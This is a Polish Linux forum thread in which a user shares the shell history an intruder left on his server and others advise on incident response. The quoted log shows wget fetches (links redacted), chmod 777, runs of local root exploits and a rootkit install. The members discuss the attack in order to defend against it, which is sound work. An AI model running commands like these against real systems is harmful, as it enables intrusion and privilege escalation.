Włamanie?

[narrow]

Witam!

 

mam problem

jakis czas temu z obcemu IP ktos sie wdarl na moj serwer na konto uzytkownika

i mam liste polecen ktore wykonal na moim serwerze:

w
uname -a
ls
cd /tmp
cd .tmp
mkdir .tmp
cd .tmp
wget link_usunięty_przez_modratora/loco1/aVe.txt;chmod 777 *
./aVe.txt
./aVe.txt
id
wget link_usunięty_przez_modratora/loco1/uselib24;chmod 777 *
./uselib24
id
uname -a
wget link_usunięty_przez_modratora/loco1/krad
chmod 777 *
./krad 1
./krad 2
./krad 3
./krad 4
./krad 5
./krad 6
./krad 7
./krad 8
./krad 9
passwd
passwd
passwd
ls
cat /etc/hosts
wget link_usunięty_przez_modratora/loco1/unixcod.tar.gz;tar zxf unixcod.tar.gz;cd       unixcod;wget link_usunięty_przez_modratora/loco1/root
mv root data.conf
./unix 83.14
cd ..
cd /
/sbin/add
logout

 

nie bardzo wiem o co chodzi i czy cos wskoral

dzis dostalem maila od jakiejs firmy ze ktos z mojego serwera probowal sie

do nich wlamywac metoda slownikowa

 

o dziwo do mnie codzinnie mam po kilkanascie a nawet dziesiat prob wlamania

ta sama metoda tyle ze z roznych IP

 

co radzicie?

Edytowane Marzec 22, 2006 przez _PaT

[@WalDo]

co radzicie?

Zainteresować się bezpieczeństwem

Był tu niedawno wątek nt. bezpieczeństwa serwera http://forum.fedora.pl/index.php?showtopic=9720&hl= Oczywiście na stacji roboczej nie potrzeba aż tyle, ale zacząłbym od zrobienia dobrego firewall'a (można znaleźć niezłe przykłady z opisami tu na forum - poszukaj użytkownik ati, hasło iptables, w części "szukaj postów od" zaznacz kiedykolwiek)

 

Druga rzecz to zapoznaj się ze snortem - system detekcji włamań.

 

Poza tym jak wiesz o włamaniach, to zbieraj logi i możliwie najwięcej informacji przesyłaj do swojego dostawcy internetu, a jeśli możesz namierzyć adres atakującego to również do jego providera. Zazwyczaj są to adresy abuse@... (np. dla serwera users.volja.net jest to [email protected])

Szczegóły można sprawdzić przez polecenie "whois <IP address>" lub w formie bardziej przyjaznej np. na http://www.ripe.net/

 

No i może jeszcze użyj poleceń "chrootkit" oraz "rkhunter" - możesz mieć (i zapewne masz) zainstalowane tzw.rootkity, chociaż szanujący się hacker napisze raczej własny, który przez jakiś czas nie będzie rozpoznawany przez standardowe narzędzia. Ale warto spróbować.

 

[EDIT] nie "chrootkit" tylko "chkrootkit" - sorki.

 

Pozdr,

W.

[puchatek_nerwus]

co ty masz za hasla ? 12345 ? to jest twoje haslo na root`a ? przepraszam ze krytykuje... aczkolwiek do takiej sytuacji nie powinno dojsc... a po 2 sprawdz skad jest tamten user i napisz do admina...

[walwat]

Wygląda to źle.

Z tego co mogę przeczytać, ktoś wylistował ci użytkowników, potem na konto jednego z nich sie zalogował (popracuj nad hasłami).

Stworzył katalog .tmp, załadował pliki aVe i uselib, potem coś co mnie niepokoi czyli krad, a na koniec pewnie rootkita - ostatnie wpisy.

Z tego kompa atakuje potem twoją firmę.

 

Jak najszybciej odłącz kompa od sieci i zbierz z logów tyle informacji ile możesz, a potem radzę nic nie usuwać takimi narzedziami jak chkrootkit, tylko jaśli możesz sobie na to pozwolić (czytaj odłączyć kompa na jakiś czas) to nie bawiąc się w żadne pisanie na abuse (to trwa długo i mało prawdopodobne abyś coś w ten sposób wskórał), zgłoś to na policję.

To było na 100 % włamanie i zainstalowanie jakiegoś syfu.

Załącz dysk twardy jako dowód.

Jeśli decydujesz się sam sobie z tym poradzić, to przeszukaj ręcznie te ścieżki i pliki, które widzisz w logach, pokopiuj obce pliki (jako dowód na przyszłość).

Potem chkrootkit, ale jego najnowsza wersja ze strony domowej chkrootkita, zainstaluj jakiś antywirus (np. F-prot, albo Bit Defender - paczki .rpm sa na stronach tych programów)

 

Kopiuj pliki, które usuwasz (gdzieś na boczku, np na CDROM).

 

Jeśli te programy znajdą to co już sam znalazłeś to dobrze, problem pewnie z głowy, jeśli nie to, pozostaje ci reinstalka Fedory.

 

A potem na czystej instalacji zainstaluj sobie te narzędzia, o których pisałem i aide.

Jest to program, który wylistuje ci wszystkie zmienione pliki w systemi, ale to ma sens na czystej instalacji i uaktualniać bazę po każdych operacjach/ instalacjach w systemie, albo regularnie np co tydzień. Teraz na to już jest za póżno.

 

Koniecznie wzmocnij hasła !!! O dobrym firewallu nie pisze, bo to obowiązek.

[Gość amdfanatyk]

przede wszystkim to wywalcie ten cytat bo to jest instrukcja w pigulce;

 

pobralem ten syf zeby sie mu troche przyjrzec ale na doglebna analize nie mam czasu;

 

Local Root exploit based on do_brk and do_munmap

    transformed by bcb5b7f1d2a11b2d50956934d301f2f7

      POLAND

Menu:   

    1. do_munmap attack (Tested on kernels 2.x.x)

    2. do_brk attack    (Tested on kernels from 2.4.18 to 2.4.22)

 

wyglada na to, ze odpalil 3 exploity, z ktorych 2 pierwsze zapewne nie zadzialaly no a na koncu zabral sie do bruteforce'owania ssh.

[Gość _PaT]

przede wszystkim to wywalcie ten cytat bo to jest instrukcja w pigulce;

 

Ktoś popiera ten pomysł? Wydaje mi się, że taki cytat służy uświadamianiu, jak niewinnie może wyglądać włamanie. Jeśli ktoś chce "pigułkę", to ma google. Jestem za tym, aby nie usuwać (a także nie próbować się włamywać).

[@WalDo]

Potem chkrootkit, ale jego najnowsza wersja ze strony domowej chkrootkita,

Jaka jest różnica między tym co jest na stronie domowej chkrootkit a wersją w repo yuma? Z tego co widzę ostatnia aktualizacja była w październiku ubiegłego roku. W repo i na stronie można pobrać wersję 0.46a - niby to samo, więc ciekawi mnie czy to tylko odruch pobierania źródeł u samego źródła czy jakieś inne przesłanki?

 

BTW: ja oczywiście jak zwykle zacząłem z rozpędu, ale podstawowa sprawa to chyba to o czym napisał walwat - zabezpieczyć kopię dysku a przynajmniej logów dla prokuratora. W razie jakieś sprawy przeciwko Tobie będziesz mógł się łatwiej wybronić, że Twój komp to było tylko zombie.

 

[Edit] Wg mnie cytat powinien zostać. Nie wszyscy wiedzą na co zwracać uwagę, a tu widać kilka ciekawych rzeczy. Bez cyctatu komentarze stają się nieczytelne i daja jakąś wiedzę tylko założycielowi wątku a nie o to chyba chodzi na forum.

Pozdr,

W.

[walwat]

Jest różnica, te wersje na stronie domowej są uaktualniane o nowe syfy, coś jak uaktualnianie bazy wirusów w programach antywirusowych.

Może nie tak często, ale jednak.

Jeśli w repo jest aktualny, to tylko plus dla Fedory.

Ja korzystam z oryginalnych.

Szkoda, że nie ma updete'u on line...

 

walwat

[@WalDo]

Jest różnica, te wersje na stronie domowej są uaktualniane o nowe syfy, coś jak uaktualnianie bazy wirusów w programach antywirusowych.

Czyli pomimo, że wersja jest ta sama to zawartość tarballa ze strony może być "bogatsza" niż RPM-a w repo? A nie ma możliwości ściągnięcia jakiegoś pliku z wzorcami rootkitów (tak wzorem av właśnie)? Bo takie ciągłe rekompilacje to mi się jakoś niezbyt uśmiechają

A że nie ma update'u online to faktycznie szkoda, jeśli to taka historia jak mówisz.

Pozdr,

W.

[walwat]

Tego, czy w obrębie jednej wersji są dokonywane uaktualnienia to nie wiem.

Ja na wszelki wypadek biore te ze strony projektu, aby nie czekać na robienie .rpm pod Fedore.

Tak robie w przypadku tylko tego jednego programu (w Fedorze) - to przyzwyczajenie z BSD a proopo's pobierania źródeł.

W mojej FC3 nowa paczka była z dużym opóźnieniem - pamiętam, że aktualizowana była w tym roku.

 

walwat

 

P.S. Odnośnie cytatu - uważam, że powinien zostać.

Uświadomi to użytkowników, że o bezpieczeństwo szczególnie serwera trzeba zadbać, a nie ulegać złudnemu przekonaniu ( takie posty czytałem), że skoro to LinuX i na bazie RH, to już jest bezpiecznie.

[Gość amdfanatyk]

chodzi o to, ze tam sa funkcjonujace linki i kazdy tepak moze krok po kroku odtworzyc to, co juz zostalo zrobione; co do szukania przez google to jak taki los cos znajdzie to ten exploit i tak mu najczesciej nie zadziala (zwykle w kodzie zostawia sie drobne bledy uniemozliwiajace kompilacje) a jak nawet sie skompiluje to i tak nie bedzie wiedzial co dalej z nim zrobic.

[Gość _PaT]

Jednak usunąłem linki, żeby komuś nie przyszło do głowy naśladować ataku. Nie chciałbym, aby ktoś z forumowiczów robiąc sobie żarty trafił na komisariat

[Gość amdfanatyk]

chcialbym jeszcze zapytac autora tematu jakiego rodzaju uslugi uruchamia? zapewne ssh bo przez cos intruder sie zalogowal ew. zrobil zdalnie overflow; jesli na komputer mozna sie logowac lokalnie to najlepiej uzyc LIDS, mozna nim takze zablokowac mozliwosc otwierania portow (wtedy nici z bruteforce'owania), tak (_na prawde_ → naprawdę) ORT to mozna zablokowac nim "wszystko" zaleznie jak sie napisze reguly.

[@WalDo]

chcialbym jeszcze zapytac autora tematu jakiego rodzaju uslugi uruchamia? zapewne ssh bo przez cos intruder sie zalogowal [...]

W konfiguracji okna logowania jest takie coś gdzie zawsze biegam i odhaczam natychmiast: możliwość zdalnego logowania jako root (tekstowo i przez GDM) - to jest domyślne ("Ustawienia ekranu logowania", zakładka "Bezpieczeństwo").

No i nie dam głowy, ale chyba po świeżej instalacji można się logować zdalnie przez zwykłego telneta Jak ktoś tego od razu nie zmienia, to duża szansa na poważne "kuku" jak to miał "szczęście" odczuć na własnej skórze narrow

[walwat]

Rozsądne wyjście - post został, ale bez linków.